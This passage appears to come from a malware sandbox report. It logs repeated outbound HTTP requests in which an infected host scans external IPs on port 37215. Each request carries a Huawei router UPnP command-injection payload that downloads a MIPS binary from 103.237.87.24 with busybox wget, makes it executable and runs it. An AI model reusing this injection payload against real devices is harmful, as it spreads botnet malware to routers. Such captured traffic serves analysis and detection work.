6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  817192.168.2.1344250157.247.66.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368700027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  818192.168.2.1337070157.186.111.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368710995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  819192.168.2.1351818157.111.152.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368705034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  820192.168.2.134836241.28.124.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368705034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  821192.168.2.1345088197.196.8.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368741035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  822192.168.2.1341282197.191.236.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368758917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  823192.168.2.1344156197.230.90.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368761063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  824192.168.2.1349846157.81.56.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368783951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  825192.168.2.1350450197.211.18.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368793011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  826192.168.2.134270641.197.252.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368797064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  827192.168.2.1339134197.157.226.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368980885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
